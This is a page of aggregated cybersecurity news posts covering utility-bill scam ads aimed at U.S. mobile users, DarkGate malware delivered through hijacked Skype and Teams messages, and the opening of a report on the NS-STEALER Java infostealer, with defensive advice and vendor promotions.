Widespread cyber incidents will happen, but unlike natural disasters, specific security controls can help prevent a catastrophe. Read More
Related Posts
Utility scams update
Utility scams update
Back in February, we reported on malicious ads related to utility bills (electricity, gas) that direct victims to call centers where scammers will collect their identity and try to extort money from them.
A few months later, we checked and were able to find as many Google ads as before, following very much the same pattern. In addition, we can see that miscreants are trying to legitimize their operations by creating fake U.S.-based entities.
Utility-based ads targeting mobile phones
It only took us 15 minutes to find about a dozen fraudulent ads on Google related to utility bills. This campaign is targeting mobile devices only, as far as we can tell, and U.S. residents. All the ads seen below belong to different advertisers based in Pakistan.
Some of those advertiser accounts have a fairly large footprint with several hundred ads.
Most often, the ad is not associated with a landing page (although a URL is displayed); instead clicking on the ad will bring up the phone number and prompt you to dial. Having said that, the domains used belong to the scammers and are often fairly new.
We also saw several ads that at first appear somewhat legitimate. They are registered to advertisers based in the US and their websites look almost authentic. But when you start checking the details, you realize some things don’t add up, such as an address that leads to an apartment complex.
Consumer protection
The Federal Trade Commission (FTC) has an article about utility scams, however the technique mentioned there is about scammers calling victims, rather than the other way around. For good reason many people won’t answer the phone when it shows an unknown number as it is likely yet another telemarketer. Certainly, there are victims that will answer the phone but the scam is much more effective when you are the one to initiate the call.
We have reported the fraudulent advertiser accounts to Google while we are also adding related domains to our blocklist. Remember to be extremely vigilant before calling anyone, especially if that number came from an advertisement. If in doubt, go directly to your utility company’s website using a computer and then look for a form or phone number that you can verify before dialing.
Hackers Abusing Skype and Teams to Deliver the DarkGate Malware
Hackers Abusing Skype and Teams to Deliver the DarkGate Malware
Hackers utilized the Teams and Skype messaging platforms to spread the DarkGate malware to the targeted businesses. When DarkGate malware is installed, a Visual Basic for Applications (VBA) loader script is delivered to victims.
The Windows-based malware known as DARKGATE is capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was initially made public in 2018.
According to Trend Micro, darkGate attacks were spotted in the Americas, followed closely by those in Asia, the Middle East, and Africa.
Document
FREE Demo
Deploy Advanced AI-Powered Email Security Solution
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
Distribution of the DarkGate campaign
To deploy and carry out its illicit capabilities, DarkGate also uses the automation and scripting tool AutoIt, which is designed for Windows. AutoIt is a genuine tool, but other malware families commonly utilize it to get through defenses and add an extra layer of obfuscation.
DarkGateInfection Chain Abusing Skype
The attacker simply utilized the hijacked Skype account to hijack an existing conversation thread and send a message that looked like a PDF file but was a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.
Infection Chain
Hence, the recipient recognized the sender as a member of a reliable external source. Researchers observed that the curl command, in this case, was used to retrieve the legitimate AutoIt application and the associated malicious files.
Skype message with an embedded malicious attachment posing as a PDF file
Hackers Abusing Microsoft Teams Platform
Another instance included a threat delivering a link through a Microsoft Teams message. In this instance, the victim was exposed to the possibility of spam since the organization’s technology lets them receive notifications from outside users.
Teams message with a malicious attachment
The attackers concealed a.LNK file in the Teams version of the breach. Additionally, an unidentified external sender sent the sample that abused Teams.
“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
Recommendation
Cybercriminals may use these payloads to spread malware, such as cryptocurrency miners, info stealers, ransomware, malicious and/or abusive remote management tools, and ransomware.
The organization should have control over instant messaging applications so that regulations like prohibiting external domains, limiting attachments, and, if practical, adopting scanning may be enforced.
If legitimate credentials are compromised, multifactor authentication (MFA) is strongly advised for securing apps. This reduces the threat of attacks utilizing these methods spreading.
Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.
The post Hackers Abusing Skype and Teams to Deliver the DarkGate Malware appeared first on Cyber Security News.
Cyber Security News
NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers
NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers
Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.
The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.
The ZIP file contains Read More
The Hacker News | #1 Trusted Cybersecurity News Site